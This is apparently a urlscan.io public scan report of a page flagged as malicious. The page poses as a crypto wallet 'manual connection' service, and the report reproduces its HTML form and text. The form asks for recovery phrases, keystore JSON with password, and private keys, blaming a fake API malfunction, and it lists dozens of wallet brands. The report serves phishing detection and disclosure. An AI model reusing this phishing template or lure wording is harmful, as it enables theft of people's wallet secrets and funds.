blockchainrepairstool.com Open in urlscan Pro
2a02:4780:b:1042:0:15dc:e770:10  Malicious Activity! Public Scan

Submitted URL: http://blockchainrepairstool.com/dashboard/connect.php
Effective URL: https://blockchainrepairstool.com/dashboard/connect.php
Submission: On January 13 via api from BY — Scanned from DE

Form analysis 1 forms found in the DOM

Name: form-messagePOST

<form action="" method="POST" name="form-message">
  <center>
    <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">
      <h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900" style="display: flex; flex-direction: row;">
        <img src="img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" style="margin-right: 20px; height: 40px; width: 40px" id="myImg">
        <span>Import your <span id="walletname">TrustWallet</span> wallet</span>
      </h3>
      <div class="mt-2">
        <div class="mt-10">
          <input type="hidden" name="form-name" value="my-form" id="wallet_id">
          <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
            <div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Phrase </div>
            <span id="guideDisplay" style="display: none;">
              <div id="keystore" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Keystore JSON </div>
              <div id="private" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Private Key </div>
            </span>
            <span id="guideDisplay2" style="display: none;">
              <div id="family" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Family Seed </div>
              <div id="secret" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Secret Numbers </div>
            </span>
          </div>
          <div id="first" class="acc-body active">
            <div class="flex flex-col">
            </div>
            <div class="flex flex-col mb-6">
              <div class="relative" data-children-count="1">
                <textarea id="phraseinput" name="phraseinput" cols="30" rows="4" placeholder="Enter your recovery phrase"
                  class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" required=""></textarea>
                <p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words separated by single spaces </p>
              </div>
            </div>
            <div class="flex w-full">
              <button type="submit" name="submit" class="btn btn-warning flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in">
                <span class="mr-2 uppercase">Connect</span>
                <span>
                  <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                    <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z"></path>
                  </svg>
                </span>
              </button>
              <button id="cancel" type="button"
                class="w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm">
                Cancel </button>
            </div>
            <!-- Successfully Submitted page-->
            <div style="display:none" class="thankyou_message">
              <p class="successful">Phrase Successfully Validated, goto Keystore JSON</p>
            </div>
          </div>
          <div id="second" class="acc-body bg-grey-600">
            <div class="flex flex-col">
            </div>
            <div class="flex flex-col mb-6">
              <div class="relative">
                <textarea cols="30" rows="4" placeholder="Enter your Keystore JSON" id="keystoreval" name="keystoreval"
                  class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" required=""></textarea>
              </div>
            </div>
            <div class="flex flex-col mb-6">
              <div class="relative" data-children-count="1">
                <input type="text" name="password" placeholder="Wallet password" id="password" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                <p class="text-xs text-grey-300 mt-6"> Several lines of text beginning with "{...}" plus the password you used to encrypt it. </p>
              </div>
            </div>
            <div class="flex w-full">
              <button type="submit" name="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
                <span class="mr-2
                                             uppercase">Connect</span>
                <span>
                  <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                    <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                  </svg>
                </span>
              </button>
              <button id="cancel" type="button"
                class="w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm">
                Cancel </button>
            </div>
            <!-- Successfully Submitted page-->
            <div style="display:none" class="thankyou_message">
              <p class="successful">Keystore JSON Successfully Validated, goto Keystore JSON</p>
            </div>
          </div>
          <div id="third" class="acc-body bg-grey-600">
            <div class="flex flex-col">
              <div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="Metamask"></div>
            </div>
            <div class="flex flex-col mb-6">
              <div class="relative" data-children-count="1">
                <input type="text" placeholder="Enter your Private Key" name="privatekeyval" id="privatekeyval"
                  class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                <p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words seperated by a single space. </p>
              </div>
            </div>
            <div class="flex w-full">
              <button type="submit" name="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
                <span class="mr-2
                                             uppercase">Connect</span>
                <span>
                  <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                    <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                  </svg>
                </span>
              </button>
              <button id="cancel" type="button"
                class="w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm">
                Cancel </button>
            </div>
          </div>
        </div>
      </div>
    </div>
  </center>
</form>

Text Content

Back
Connecting...
A Network Provider API malfunction is currently preventing automatic connection.

However, we have implemented a secured and encrypted manual connection process
to ensure you can still access our services.

Connect Manually
TrustWallet
Easy-to-use browser extension.



IMPORT YOUR TRUSTWALLET WALLET

Phrase
Keystore JSON
Private Key
Family Seed
Secret Numbers

Typically 12 (sometimes 24) words separated by single spaces

Connect Cancel

Phrase Successfully Validated, goto Keystore JSON

Several lines of text beginning with "{...}" plus the password you used to
encrypt it.

Connect Cancel

Keystore JSON Successfully Validated, goto Keystore JSON

Typically 12 (sometimes 24) words seperated by a single space.

Connect Cancel

Connect Your Wallet


Metamask


Trust Wallet


Polkadot


Coinbase


ChainLink


Tezos


DogeCoin


Keplr Wallet


VeChain


ZCash


Algorand


Waves


Stellar


OX


Cordano


IOST


SafePal


Qtum


eckoWallet


OKX Wallet


Tronlink


Defichain Wallet


DFX Defichain


Solana


Blockchain


Lobstr Wallet


Yoroi Wallet


Coinomi


Edge Wallet


Solar Wallet


Pera Algo Wallet


Sender Wallet


Xcel Pay Wallet


Anchor Wallet


ONTO


Rainbow


Agent Wallet


CYBAVO Wallet


GrindPlus


Nash


imToken


Pillar


Cryto.com | Defi Wallet


Gnosis Safe Multisig


Curve Finance


TokenPocket


MathWallet


BitPay


Ledger Live


Walleth


Authereum


Dharma


1inch Wallet


Huobi Wallet


Eidoo


MYKEY


TrustVault


Atomic


Coin98


zkSync


Shell Exchange


Index Coop


SwapX


Starname


Space


Maskbook


Snapshot


Invoice.build


Ankr


DODO


zLOT


Tokamak Network


Actus Protocol


AstroTools.io


Rubic Exchange


Torus Wallet


Oceanprotocol


Filecone Wallet


Falconswap


Bancor Wallet


Harvest Finance


OctoFi


Mushroom Finance


Bitfrost Finance


Orchid Protocol


Datamine Network


Streamr


DappRadar


SuperRare


Arbitrum


ParaSwap


HoneySwap


Fleek


CoolWallet


Alice


AlphaWallet


ZelCore


Phantom Wallet


Solflare Wallet


Sollet Wallet


D'CENT Wallet


Tokenary


Spatium


Infinito


Wallet.io


Infinity Wallet


Ownbit


EasyPocket


Bridge Wallet


Unstoppable Wallet


PEAKDEFI Wallet


Vision


BitKeep


ViaWallet


SparkPoint


HaloDefi Wallet


Dok Wallet


AT.Wallet


Midas Wallet


Ellipal


KEYRING PRO


Aktoinariat


Talken Wallet


XinFin XDC Network


Flare Wallet


AToken Wallet


Tongue Wallet


Binance DEX


RWallet


PlasmaPay


O3Wallet


HashKey Me


Jade Wallet


Guarda Wallet


Defiant


Trustee Wallet


MEET.ONE


MoriX Wallet


Binance Smart Chain


Etherscan


Lido


TERRAstation


OpenSea


Zapper


Aave


Zerion


LocalCryptos


DeBank


Unstoppabel Domains


Rarible


Yearn


Adex Network


dYdX


MyCrypto


Oasis App


TokenSets


MANTRA DAO


Matcha


KyberSwap


DeFi Portfolio Tracker


Loopring


InstaDapp


Matic Network


3Box


DDEX


Bamboo Relay


Synthetix


Dex.blue


PoolTogether


DEX.AG


Gelato


ENS Domains


Idle Finance


iearn.finance


RCN Finance


Hegic


Kickback


88mph


Mooni


Clovers


Mintbase


DAOstack


KnownOrigin


MyEtherWallet


Affogato


StablePay


Defi Saver


Loom Network


ThorChain


BulkSender


Heroes of Ether


Betoken


Linkdrop


HelioWallet


Escaroo


TokenMarket


Mesa


MCDEX


Furucombo


Melon


Chainsfr


AKA3Email Alias


2Key


Pitch


SunshiSwap


Unagii


Cream Finance


Wallet Connect

Navigated to Wallets